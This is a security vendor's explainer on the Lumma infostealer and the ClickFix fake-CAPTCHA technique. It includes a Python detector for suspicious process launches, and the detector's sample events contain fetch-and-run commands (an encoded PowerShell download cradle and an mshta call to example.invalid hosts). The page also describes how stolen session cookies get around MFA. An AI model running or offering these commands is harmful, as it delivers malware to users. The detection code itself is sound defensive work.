What Is Lumma Stealer
Short answer
Lumma (also tracked as LummaC2) was the most widely deployed infostealer of 2025, having overtaken RedLine as the dominant credential stealer. It is known for rapid development, modular payloads, and evasion features, and is sold as Malware-as-a-Service (MaaS) through Telegram and underground forums. A coordinated takedown in May 2025, led by Microsoft's Digital Crimes Unit with the US Department of Justice and Europol, seized its command-and-control domains, but the service resumed operating within months and its logs continued to circulate.
Why Lumma dominates
Lumma's success comes from constant development: its operators push frequent updates with new evasion techniques, additional data targets, and improved exfiltration. The stealer is modular, so operators can configure which data types to collect and how the payload is delivered. The MaaS model lowers the bar to entry and puts the tool in the hands of a wide range of attackers.
What Lumma steals
Lumma targets browser-stored credentials, cookies and session tokens, cryptocurrency wallets, browser extension data (notably cryptocurrency-wallet and authenticator extensions), autofill data, and system information. Some variants also capture screenshots and clipboard contents. The cookies and session tokens are what make the logs valuable on criminal marketplaces: a buyer who imports a still-valid session cookie into their own browser is already authenticated and never sees the password or MFA prompt, so a Lumma log can lead to account takeover even where MFA is enforced.
Distribution methods
Lumma is distributed through cracked software downloads, malvertising, phishing emails, and SEO poisoning. Some campaigns use fake CAPTCHA or "verify you are human" pages (the ClickFix technique): the page copies a command to the clipboard and instructs the user to press Win+R, paste, and press Enter. The pasted command, usually PowerShell with a hidden window and a base64-encoded argument, or mshta pointed at a URL, downloads and runs the stager. Because the user performs the execution, no exploit or attachment is involved and mail and browser protections have little to block. The chain does leave marks in endpoint telemetry: the Run dialog is hosted by explorer.exe, so the interpreter appears as a child of explorer.exe, and the pasted command is also recorded in the user's RunMRU registry key.
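The detection logic a SOC would write for that fake-CAPTCHA chain, as an added example that is not Passguard's or Lumma's code: it runs over constructed process-creation events in Sysmon Event ID 1 style (Image, ParentImage, CommandLine), decodes the -EncodedCommand argument the way PowerShell does (base64 of UTF-16LE, not UTF-8), and matches download cradles and in-memory execution keywords in both the raw command line and the decoded payload. The hostnames under example.invalid and the event details are hypothetical; the indicator list is a starting point, not a complete ruleset.

```python
"""Flag ClickFix / fake-CAPTCHA style executions in process-creation telemetry.

Added example, not Passguard's or Lumma's code. Events below are constructed
in Sysmon Event ID 1 style (Image, ParentImage, CommandLine); the hostnames
under example.invalid are hypothetical.
"""
import base64
import binascii
import re

# Interpreters a pasted "verification" command typically lands in.
SUSPICIOUS_CHILDREN = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe"}
# The Win+R Run dialog is hosted by explorer.exe, so a pasted command appears
# as explorer.exe -> <interpreter>. On its own that is not an alert (shortcuts
# launch the same way); it is recorded only when other indicators already hit.
RUN_DIALOG_PARENTS = {"explorer.exe"}

INDICATORS = {
    "download_cradle": re.compile(
        r"(?i)\b(?:irm|iwr|invoke-webrequest|invoke-restmethod|downloadstring|net\.webclient)\b"),
    "in_memory_exec": re.compile(r"(?i)\b(?:iex|invoke-expression)\b"),
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "mshta_url": re.compile(r"(?i)\bmshta(?:\.exe)?\s+[\"']?https?://"),
}
# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe.
ENCODED_CMD = re.compile(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")


def encode_ps(script):
    """Encode a script the way -EncodedCommand expects: base64 of UTF-16LE bytes."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the plaintext behind a -EncodedCommand argument, or None.

    Decoding must go through utf-16-le: a utf-8 decode of the same bytes
    yields NUL-separated characters and defeats keyword matching.
    """
    m = ENCODED_CMD.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Score one process-creation event and return the reasons it was flagged."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    cmdline = event["CommandLine"]
    reasons = []
    decoded = None
    if image in SUSPICIOUS_CHILDREN:
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            reasons.append("encoded_command")
        # Match against the raw command line and the decoded payload: the
        # download cradle is usually only visible inside the base64 blob.
        for text in (cmdline, decoded or ""):
            for name, pattern in INDICATORS.items():
                if name not in reasons and pattern.search(text):
                    reasons.append(name)
        if reasons and parent in RUN_DIALOG_PARENTS:
            reasons.append("spawned_from_run_dialog")
    return {"suspicious": bool(reasons), "reasons": reasons, "decoded_command": decoded}


def scan(events):
    """Return (event, verdict) pairs that deserve analyst attention."""
    alerts = []
    for ev in events:
        verdict = analyze_event(ev)
        if verdict["suspicious"]:
            alerts.append((ev, verdict))
    return alerts


# Constructed sample telemetry (hypothetical hosts; not real campaign data).
SAMPLE_EVENTS = [
    {   # Fake-CAPTCHA "verification": pasted into Win+R, hidden window, fetches a stager.
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe -w hidden -ep bypass -enc "
                       + encode_ps("irm https://verify.example.invalid/check.txt | iex"),
    },
    {   # Same idea via mshta, which fetches and runs an HTA straight from a URL.
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "mshta https://captcha.example.invalid/robot.hta",
    },
    {   # Legitimate admin script from a terminal: an interpreter, but no indicators.
        "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "ParentImage": r"C:\Users\admin\AppData\Local\Microsoft\WindowsApps\WindowsTerminal.exe",
        "CommandLine": r"pwsh.exe -File C:\scripts\rotate-logs.ps1",
    },
    {   # Ordinary desktop launch from explorer.exe.
        "Image": r"C:\Windows\System32\notepad.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "notepad.exe",
    },
]

if __name__ == "__main__":
    for ev, verdict in scan(SAMPLE_EVENTS):
        print(ev["Image"].rsplit("\\", 1)[-1], verdict["reasons"], verdict["decoded_command"])
```

The explorer.exe parent is deliberately a weighting factor rather than a trigger on its own, because double-clicking a .ps1 shortcut produces the same parent-child pair; the encoded-command decode is what turns an opaque base64 blob into a matchable download cradle. In a real pipeline the same checks would also be run against RunMRU values collected from endpoints, since that key holds the exact string the user pasted.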
How Passguard detects Lumma
Passguard monitors the criminal marketplaces and Telegram channels where Lumma logs are traded. When infected devices with stolen sessions linked to your organization are listed for sale, Passguard alerts your security team with the details needed to act: device information, malware type, compromised sessions, and infection timeline. Run a free scan at passguard.com to see if Lumma logs referencing your domain are already in circulation.
